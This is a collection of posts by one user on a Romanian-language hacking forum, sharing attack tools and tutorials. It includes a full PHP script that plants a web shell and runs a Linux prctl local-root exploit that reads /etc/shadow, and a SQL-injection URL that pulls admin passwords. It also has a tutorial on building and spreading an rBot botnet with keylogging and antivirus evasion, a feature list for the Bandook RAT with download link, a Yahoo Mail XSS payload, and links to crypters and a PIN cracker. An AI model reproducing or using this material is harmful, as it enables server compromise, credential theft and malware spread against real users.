alexcargo
-
Posts
122 -
Joined
-
Last visited
Posts posted by alexcargo
-
-
dupa cum spune si titlu converteaza orice in .bat
-
<?php
/*
Kernel Exploiter for use in RFI bugs.
*/
set_time_limit(0);
if(isset($_POST['exploit_it'])) {
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
if($_POST['compiler'] == "none") {
echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>';
end;
}
$cc = $_POST['compiler'];
$prctl = '#!/bin/sh
cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__
cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void)
{
setgid(0);
setuid(0);
if (getuid() == 0) {
printf("\n[+] We have root!\n\n" );
system("/bin/sh");
system("$_POST[cmd]");
';
if(!stristr($_POST['shell'],"could not be found")) {
$prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");';
}
$prctl .= 'system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/core*");
system("exit");
} else {
printf("\n[-] Failed.\n\n" );
system("rm -rf '.$_ENV["TMPDIR"].'/s");
}
return 0;
}
__EOF__
';
$phpwrapper = '<?php
if(isset($_GET[cmd])) {
echo "<pre>";
echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\"");
echo "</pre>";
}
?>';
echo "<pre><div align='center'>";
$h = fopen("/tmp/a.sh", "w");
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit....
";
echo passthru("sh /tmp/a.sh");
echo passthru("$cc -o /tmp/s /tmp/s.c");
echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c");
echo "Running exploit...waiting about 4 minutes to see if exploit worked
";
echo passthru("/tmp/getsuid");
echo passthru("/tmp/s");
echo "Cleaning up
";
echo passthru("rm -rf /tmp/getsuid*");
echo passthru("rm -rf /tmp/s.c");
echo passthru("rm -rf /tmp/a.sh");
echo "Done!
</div>
</pre>";
} else {
echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname();
}
} else {
?>
<div align="center">
<h4>PHP Attack Script</h4>
<h5><?php echo php_uname(); ?></h5>
<pre><div align="center">
Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?>
Checking for cc or gcc............<?php
$path = explode(":",$_ENV["PATH"]);
$gotcc = FALSE;
$gotgcc = FALSE;
foreach($path as $dir) {
if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) {
$gotcc = TRUE;
$pathtocc = $dir."/cc";
echo '[ <font color="#00CC00">OK</font> ]'."\n";
break;
} elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) {
$gotgcc = TRUE;
$pathtogcc = $dir."/gcc";
echo '[ <font color="#00CC00">OK</font> ]'."\n";
break;
}
}
if($gotcc == FALSE && $gotgcc == FALSE) {
echo '[ <font color="#FF0000">Failed</font> ]'."\n";
}
?>
Checking for execute permissions..<?php
$h = fopen("/tmp/test.sh","w");
fwrite($h,"#!/bin/sh");
fclose($h);
system("sh /tmp/test.sh",$returnval);
if($returnval == 0) {
echo '[ <font color="#00CC00">OK</font> ]'."\n";
} else {
echo '[ <font color="#FF0000">Failed</font> ]'."\n";
}
passthru("rm -rf /tmp/test.sh");
?>
</pre></div>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table border="0" cellspacing="0">
<tr>
<td><div align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Prctl 2.6.x exploit</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">Location and name for root shell:</div></td>
<td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td>
</tr>
<tr>
<td><div align="right">Location and name for php shell wrapper: </div></td>
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td>
</tr>
<tr>
<td><div align="right">Commands to perform while root
seperate multiple commands with ; : </div></td>
<td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td>
</tr>
</table>
</div>
<div align="center">
<input type="hidden" name="compiler" value="<?php
if(isset($pathtocc)) {
echo $pathtocc;
} elseif(isset($pathtogcc)) {
echo $pathtogcc;
} else {
echo 'none';
}
?>" />
<input type="hidden" name="exploit_it" value="doit" />
<input name="submit" type="submit" value="Submit" />
After pressing submit it may take up to 4 minutes for the page to load depending
on exploit.
This is due to the exploit being run.
If exploit fails the system may be patched or kernel may not be vuln.
</div>
</form>
<?php } ?> -
mersi ping
dar eu am gasit chestia asta nu facuta de mine uni au facu phpshell asta si ia zis asa milw0rm nu e official dar in alte parti pe alte forumuri lumea imi sare in cap dar ei nu inteleg bine cuvantul sharing ma rog nu dau 2 bani pe ei.
-
Are you aware of all the devices – USB sticks, CDs, floppies, smartphones, MP3 players, handhelds, iPods, digital cameras – that have been connected to your network? As an administrator, do you know how many employees have been using or are using portable storage devices at the moment? Monitoring your network for these devices is not only time-consuming but nearly impossible to do manually.
http://www.endpointscan.com/
-
http://www.mytempdir.com/1314256
misto imi place :wink:
Enjoy
-
http://www.mytempdir.com/1314235
-
Google dork inurl:/blog/js.asp
http://www.site.com/blog/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
-
Exploitu 1
http://www.mytempdir.com/1314191
Exploitu 2
http://www.mytempdir.com/1314292
Enjoy :wink:
-
on error resume next
set arg=wscript.arguments
if arg.count=0 then wscript.quit
with CreateObject("ADODB.Stream")
.type=1:.open:.loadfromfile arg(0):bs=.read:l=.size:.close
end with
if err.number<>0 then wscript.quit
set fso=CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(arg(0)&".bat",2,true)
if err.number<>0 then wscript.quit
.writeline "@echo bs=_>xx.vbs"
for k=1 to l step 129
.write "@echo """
.write b64b(midb(bs,k,129))
.writeline """+_>>xx.vbs"
next
.writeline "@echo """":set rs=CreateObject(""ADODB.Recordset"")>>xx.vbs"
.writeline "@echo set ado=CreateObject(""ADODB.Stream"")>>xx.vbs"
.writeline "@echo l=len(bs):ss="""":for k=1 to l step 4096:ss=ss+ub64(mid(bs,k,4096)):next:l=len(ss)>>xx.vbs"
.writeline "@echo rs.fields.append ""b"",205,l/2:rs.open:rs.addnew:rs(""b"")=ss+chrb(0):rs.update>>xx.vbs"
.writeline "@echo ado.mode=3:ado.type=1:ado.open:ado.write rs(""b"").getchunk(l/2)>>xx.vbs"
.writeline "@echo ado.savetofile """+fso.getfilename(arg(0))+""",2:ado.close>>xx.vbs"
.writeline "@echo function ub64(s):dim t(4),b(3):ub64="""":n=len(s):r=2 >>xx.vbs"
.writeline "@echo if n mod 4^<^>0 then exit function:end if:for i=1 to n step 4:for j=0 to 3 >>xx.vbs"
.writeline "@echo a=asc(mid(s,i+j,1)):if a=43 then:a=62:else if a=47 then:a=63:else if a^>47 and a^<58 then:_>>xx.vbs"
.writeline "@echo a=a+4:else if a=61 then:a=0:if r=2 then r=j-2:end if:else if a^>64 and a^<91 then:_>>xx.vbs"
.writeline "@echo a=a-65:else if a^>96 and a^<123 then:a=a-71:else:exit function:_>>xx.vbs"
.writeline "@echo end if:end if:end if:end if:end if:end if:t(j)=a:next>>xx.vbs"
.writeline "@echo b(0)=t(0)+t(1)*64 mod 256:b(1)=t(1)\4+t(2)*16 mod 256:b(2)=t(2)\16+t(3)*4 >>xx.vbs"
.writeline "@echo for j=0 to r:if b(j)^<16 then ub64=ub64+""0"":end if:ub64=ub64+hex(b(j))>>xx.vbs"
.writeline "@echo next:next:end function>>xx.vbs&&cscript.exe //nologo xx.vbs&del xx.vbs"
end with
const b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
function b64b(bin)
b64b=""
n=lenb(bin)
for i=1 to n step 3
a=ascb(midb(bin,i,1))
b64b=b64b+mid(b64,a mod 64+1,1)
if i b=ascb(midb(bin,i+1,1))
b64b=b64b+mid(b64,(a\64+b*4)mod 64+1,1)
if i+1 c=ascb(midb(bin,i+2,1))
b64b=b64b+mid(b64,(b\16+c*16)mod 64+1,1)
b64b=b64b+mid(b64,c\4+1,1)
else
b64b=b64b+mid(b64,b\16+1,1)
b64b=b64b+"="
end if
else
b64b=b64b+mid(b64,a\64+1,1)
b64b=b64b+"=="
end if
next
end functioncopiatil intr-un fisier text si salvati ca Any2Bat.vbs sau cu ce nume doriti
-
aici este video tutorialul
http://thinstall.com/demos/vs_intro.zip
ENjoy
-
un un protector pe
http://www.mytempdir.com/1300600
-
un binder plus codu sursa
http://www.mytempdir.com/1300595
-
un binder
http://www.mytempdir.com/1300593
-
bun cryptor
http://www.mytempdir.com/1300591
-
un nou packer
http://www.mytempdir.com/1300601
-
Bluetooth PIN Cracker pentru windows sparge pinurile de la telefoane si nu numai
http://www.mytempdir.com/1299549
-
scuzati dar la ora aia cand lam pus nu mai vedeam chiar asa de bine
-
Scuze ca am incalcat regula ca nu e in romana dar mi sa parut interesant
##########################################
######### How to create a botnet #########
##### Created by g7onic - anonym0us ######
############### 10/4/2007 ################
##########################################
I wrote this in 45 mins so don't expect to much
Well since many beginners want to know how botnet and stuff works, im create a little tutorial for the beginners on this site. The tutorial includes how to install a ircd, how to compile a bot & ways to spread.
"Chapters"
1. What is needed
2. How to configure an (unreal)ircd
3. How to compile your bot
4. Make your exe UD
5. Ways of spreading.
Before I begin, my english isn't 100% good, i'll try to translate everything as good as possible, sorry for false lines or words.
1. What is needed
There are many things which are needed for creating a botnet. I'll make a list of stuff which is needed for botnets and explain why they are needed.
- Visual Studio 6.0
http://www.raptorcash.com/vb6/ms%20visual%20studio%20enterprise%206%200%20(viusal%20c++%206%200,%20visual%20basic%206%200%20interdev,%20foxpro%20+%20much%20more)(1).zip
- Visual Studio 6 Service Pack 5
http://download.microsoft.com/download/vstudio60ent/SP5/Wideband-Full/WIN98Me/EN-US/vs6sp5.exe
- Visual Studio 6.0 Processor Pack
http://download.microsoft.com/download/vb60ent/update/6/w9x2kxp/en-us/vcpp5.exe
- Core SDK
http://www.microsoft.com/msdownload/platformsdk/sdkupdate/psdk-full.htm
Safe them somewhere do cmd, cd Directory\of\file and use psdk-full Directory\of\output
Add the following paths to "Tools|Options...|Directories" in Visual Studio 6.0
Under executable files
C:\PROGRAM FILES\MICROSOFT SDK\BIN
Under include files
C:\PROGRAM FILES\MICROSOFT SDK\INCLUDE
Under library files
C:\PROGRAM FILES\MICROSOFT SDK\LIB
NOTE: It is very important that they are at the top of the path lists under Tools|Options|Directories otherwise it will not compile
2. How to configure an (unreal)ircd
Most ircd's are really easy to configurate, especially modded ones. Most of the times you only have to edit the name, the authost, the ircd port & the admin user&pass. What do we have to edit:
oper your-choosen-username { // Edit your choosen name to a username you want
from {
userhost "yourname@*"; // Edit your name to your emailaddres
};
password "your-choosen-pass"; // Edit your choosen pass to a password you want
class "default";
flags {
netadmin;
services-admin;
global;
helpop;
can_rehash
can_globalnotice;
can_globalroute;
can_globops;
can_wallops;
can_unkline;
can_kline;
can_globalkill;
can_zline;
can_gkline;
can_gzline;
get_umodew;
get_host;
can_override;
can_die;
can_restart;
};
};
Edit the flags here above, if you want to add more ircds owners just copy paste this shitme { name "QuakeNet"; info "QuakeNet"; numeric 1; };
Here is the Server name, name can be "irc.QuakeNet.org", information is just some infolisten *:6667;
easily edit the port to a port which is open, most ports from 6500 -> 7000 are openSome extra things to edit
hosts {
local "QuakeNet";
global "QuakeNet";
coadmin "QuakeNet";
admin "QuakeNet";
servicesadmin "QuakeNet";
netadmin "QuakeNet";
host-on-oper-up "yes";
};
};
The sethost's you get if you oper, like [email]g7onic@local.quakenet.org[/email] / [email]g7onic@global.quakenet.org[/email].
And just put "no" in host-on-oper-up if you don't want to get an auto-host selected.restrict-channelmodes "ntsuom";
modes-on-join "+Mustm";
Edit this to your own options to make your channel secure for youNow just safe the cfg, and your done with the config. Rar the files and uplaod it to somewhere. What you gotta do now is open a windows box (on vnc??) and download the files and place them in a secure folder, like C:\Windows\????. then just run the exe which allows to start the ircd, or run the batch file which is most there in the modded ircds, you'll see the ircd is running. Don't forget to set a password on the VNC so no-one can catch your oper user&pass, secure all the ports so your botnet don't get sniffed.
Were done with this one now too.
3. How to compile your bot
You probally found a rBot source you like by now, in the url I gave you there were many sources, I've picked a rBot, which is a good bot to start with since it got all standard functions & scanners and it's the easiest bot. ill copy and paste the config and will explain what to do.
// bot configuration (generic) - doesn't need to be encrypted
int port = 6667;
int port2 = 6667;
int socks4port = 8001;
int tftpport = 69;
int httpport = 5465;
int rloginport = 514;
BOOL topiccmd = TRUE;
BOOL rndfilename = FALSE;
BOOL AutoStart = TRUE;
char prefix = '.';
int maxrand = 8;
int nicktype = CONSTNICK;
BOOL nickprefix = FALSE;
#ifdef DEBUG_LOGGING
char logfile[]="%temp%\\yas.jpg";
#endif
#ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!
#else // Recommended to use this only for Crypt() setup, this is unsecure.
char botid[] = "rx-asn-2-re-worked";
char version[] = "v2 by ovelayer";
char password[] = "yourpass";
char server[] = "";
char serverpass[] = "";
char channel[] = "#";
char chanpass[] = "";rd
char server2[] = ""
char channel2[] = "#";
char chanpass2[] = "";
char filename[] = "yourfile.exe";
char keylogfile[] = "keylog.xml"l
char valuename[] = "";
char nickconst[] = "rBot|";
char szLocalPayloadFile[]="yourfile.exe";
char modeonconn[] = "-xi+B";
char exploitchan[] = "#*";
char keylogchan[] = "#*";
char psniffchan[] = "#*";
char *authost[] = {
"yournick@172.0.0.1"
};
char *versionlist[] = {
"mIRC v6.12 Khaled Mardam-Bey",
};
char regkey1[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
char regkey2[]="Software\\Microsoft\\Windows\\CurrentVersion\\RunServices";
char regkey3[]="Software\\Microsoft\\OLE";
char regkey4[]="SYSTEM\\CurrentControlSet\\Control\\Lsa";
#endif
#ifdef PLAIN_CRYPT
char key[16] = "39lwmmqopma24ik1"; // CHANGE THIS!!! hmmm..Do I even need this now?
#endif1. Change the port to the port of your ircd, normally it's 6667, if you got else, just change them.
2. Change the prefix, normally its ".", thats what you have to use before the command so like ".login yourpass".
3. the password, change it to login to your bot ".login unknownpass"
4. the serverpassword, probally you ain't got one but if so edit there.
5. the server, add your IP/DNS There.
6. Your channel, edit your channel where the bots got to join.
7. Your chanpass, change it to be more secure.
8. leave the server 2 of rbot, cuz the code of that thing doesn't work.
9. Change the filename so it won't get killed easily by a user because it's a suspicious virus.
10. the file where the computers puts his keylog shit in, not needed actually.
11. value name, so if your exe is called nod32, then the valuename = Nod32 AntiVirus or something
12. nickconst is the prefix before a bot. like rBot|12312312
13. the modes on connect, you can leave that as it is.
14. exploit channel, if the bot is spreading it will leave it exploit message's there.
15. The keylog & psniff channel, it will send the pstore & keylog messages, but PSNIFF isn't working in rBot so fuck that
16. The authost, you can set your authost like g7onic@*, that will require you to have a nicname with all hosts, you can set *@anonym0us.eu, that will require you to have your host set like anonym0us.eu and you have to most secure one: g7onic@anonym0us.eu this requires you the nickname & the host!.
17. Leave the rest as it is.
Ask for questions, but I think this help you out.
4. Make your exe UD.
Before you start with everything you got to secure your exe, there are packers for, it's hard to get a good packer at this moment, but you can use some public ones which make you exe detected for nod32, kasperspy etc (the big antivirus company's). Your file got to be small so it's easy to spread to other rooted boxes, but also undetected, otherwise a antivirus detect it.
5. Ways of spreading
Their are many different types of spreading, you need bots to start with before you can spread via exploits which are in your bots. There are different ways to get your bots, you can easily ask a mate to let his bots download some bots to your exe which allows you to start a bnet, but you can also spread via torrent just make a torrent with a movie and your exe as "codec" or something, or scan for some vnc's and infect them easily opening ie and open exe (REMOVE HISTORY!).
If you got some bots ( upper 30 bots ) you can start spreading, your bots have different types of exploits in it, asn1smb, lsass, dcom and all standard exploits, Since these are old they won't spread fast, but some of them still work okay on the right range. the standard command to scan with your bots is .advscan exploit <Threads> <seconds> <delay> ip range <flags (use -b-r) so like .advscan asn1smb 80 5 0 255.255.x.x -b -r.
Well this was all, it's just a lil explaination of howto. For questions or addons of you all, just pm me or post it here, ill edit this post.
Grtz,
g7onic
-
Bandook is a FWB#++ Reverse Connection Rat (Remote Admin Tool) , with a Small Size server when packed 30 KB , and a Long list of amazing Features .
Feature list of the Program
• Firewall bypass method: FWB#++ (Code Injection , API Unhook , Kernel Patch)
• reverse connection, all traffic through one port
• Safe Thread Based Client
• Persistance (Irremovable)
• Rootkit
• Plug•ins Based Server (30 KB Packed)
• Very Friendly Graphical User Interface
• Different Installation Pathes
• PNG / JPEG Compressions for screencapture and webcam
Managing Features :
• Filemanager with all types of functions, including Folder Mirror , Rar Folder/Files , File Search , Infect Files , Multiple Files Download / Upload , Download / Upload manager
• Registry Editor with all type of Functions
• Process manager (Shows Full path , and Modules Manager)
• Windows Manager (including a Send Key Function)
• Services Manager
Connection Features :
•Socks 4 proxy
•HTTP / HTTPS proxy
•Port Redirection
•TCP TUNNEL
•HTTP WEB Server
•FTP Server
•Remote Shell
•Flooding ( Mailbomb , DDOS attacks)
Spying Features :
•Screen manager with Screen Clicks
•Cam manager that Supports system with Multiple Cams
•Mic Manager (Record voice from Mic)
•Ims Spy (MSN,YAHOO,AIM)
•Keylogger ( live One )
•Offline keylogger (Colored HTML) , Live Passwords , IMS Spy with
Automatic Delivery to FTP
•Cached PWS Fetcher [6 embended PWS Plugins]
•VNC (Remote Desktop Live Control)
•Site Detection : Check all ur vics and know which one visits a specific site
•Clipboard manager
•Information about the remote machine
•Cache Reader
•Screen Recorder ( Record the user activities on the Screen into AVI Movies)
Others :
•Shutdown Menu
•Nuclear Fun Agent (Fun)
•Download from WEB / Mass Download / Seclection Download
•Visit Site
And Many Others Features , Try it urself
Changes in 1.35
---------------
-Added Computer Name Next to username to Stop Duplication of Dirs with Same names
-Added Selection Mass Download , u Can Select the Vics u want to Download Files on them
-Fixed Crashing on Wrong Utilities Plugin
-Fixed Crashing on Information Retreiving
-Fixed few stuffs in File manager (Dirs , file listing , Drives listing ect)
-Added TCP TUNNEL
-Double Click on The Row Copies the IP to Clipboard [Client]
-Fixed Download Folder where not being Created Sometimes
-Added Notifications Back
-Fixed Persistence bug when used different Dir than System32
-Unicode Support has been added to the Client [so Multi Languages will be available in Next version]
-Updated the PWS Components with latest versions
-FIXED PWS Plugin Crash when Firefox Not found
-Fixed File Size Problem in all Download procedure , wich made file unreadable or screenshot unviewable on some vics
-Implemented a Threads Handler using SendMessage to Make the Client Safe Thread
-Replaced Ping Interval from MS to Seconds
-Fixed a Bug in Windows 2000 [shellExecute] causing many crashes on VNC,VID REC,PWS ect..
-Fixed many Windows 2000 Bugs [important]
-Added Ability to retreive IP and port Via URL
-Fixed Cam manager totaly
-Removed Popups menus from Screen and Cam manager and Moved to Options
-Added Offline IM SPY (MSN,YAHOO,AIM)
-Added NFA Plugin [MS Agent 2.0 Control]
-Added Ability to Listen on Multiple Ports in the Same Time [in The Client]
-Added FTP Server [Require Utility Plugin]
-Changed Screen Clicks Method , Enable Screen Clicks and Click Directly on the image
-Added Uninstall Service to Service Manager
-Fixed Compression Set in Cam manager
-Added Cache Reader [Require Utility Plugin]
-Added Shutdown Menu
-Added Modules Manager to the Process Manager
-Fixed Folder Mirroring
-Added Ability to Delete Multiple Files in File manager(Selection)
-Added Stats [Client]
-Added Open Windows Menu [Client]
-Added Shortcut Menu [Client]
-Changed the GUI of the Client
-Fixed Cam Manager , Added ability to Select from Multiple Cams
-Choose Installation Location in Create Server
Changes in 1.34
----------------
-NEw Rootkit
-Option for Bandook to Send Offline logs automaticly to FTP Server
-Implemented Drag and Drop For Multiple File for Upload , and Multiple File Selection For Download
-Added List Sorting in File manager (Name,Size,Date)
-Added a Multiple File Transfer manager (upload / Download)
-Fixed memory Leaks that was happening in Filemanager , reg manager ect
-Fixed Online Keylogger
-Fixed a Bug that was causing some utility functions not to work cause of the 3 DNS
-Added File Search [Requires Utility Plugin]
-Added Screen Video Record [Requires SVIDEO Plugin]
Changes v1.33 v3
-----------------
[use new client with new server]
-Loaded most Apis Dynamicly (Use Unpacked for Undetection)
-Mouse Drawn when taking a Screenshot
-Multiple DNS
-Fixed Upload Socket Active
-Client Resizable
-Changed Cached PWS into 1 Big Plugin Containing 6 PWs Plugin
-Added Rar Plugin [Rar Dir - Rar File in File manager]
Changes v1.33 v2
----------------
-Added Remote Mailbombing
-Added DDOS Attacks
Changes v1.33
----------------
-Infect File Added
-Changed keylogger now gets all chars (russian ect)
-Added a decent offline / Pass Logger
-Added Service Manager
-Fixed Clipboard managr
-Added Check for right plugin , it wont crash anymore if u install old plugins
-Changed commands handling again
-Added Last modified Date to file manager
-Fixed / tweaked many stuffs
Changes 1.32 Version 2
-----------------------
-Added Clipboard manager
-Fixed Rootkit
-Added Site Detection
Changes 1.32 :
--------------
*1 Port Usage for Everything (you will only need to forward the connection port if u are
behind a router Smile )
*VNC Plugin Added
*System Information Added
*All Sockets Has been Changed
*Direct Plugins Upload
*Many Fixes
*MSN Style Notifications Disabled in this verison due to Client memory leaks
v1.31 Change Log
-----------------
-Optimised bandook totaly
-added Exceptions handling
-Added Error handling
-Changed the Inet resolving Method
-Changed The File manager System (Faster)
Download:
http://www.nuclearwintercrew.com/download.php?prog=57
-
nod32 sau Kaspersky + Xoftspy sau CounterSpy
dar ma rog nu exista cel mai bun antivirus sau antispyware
-
e nascut de curand dar va creste cine vrea sa il viziteze e primit cu placere mai multe de pus
-
si mie mi la dat cineva mah nu lam gasit eu
-
This XSS Vuln only affect Original Yahoo Mail, Yahoo! Mail Beta is not affected.
In Original Yahoo Mail, when you browse mail content, there are two links point to the next mail and two links point to the previous mail. Here are there HTML code:
Yahoo mail system will replace the links, sender name, subject to the corresponding values.
Because HTML Entities will be treat as original characeters when inside on* event then we can inject ' to the window.status setting command, and write any script after it.
Proof of Concept:
If a mail subject is "';alert(String.fromCharCode(88,83,83));//" (without quot), then when browses the next mail of it, the HTML code of links to the previous mail will become:
When the mouse move over it, XSS alert box will appear.
-
Analizeaza Malware
in Linkuri
Posted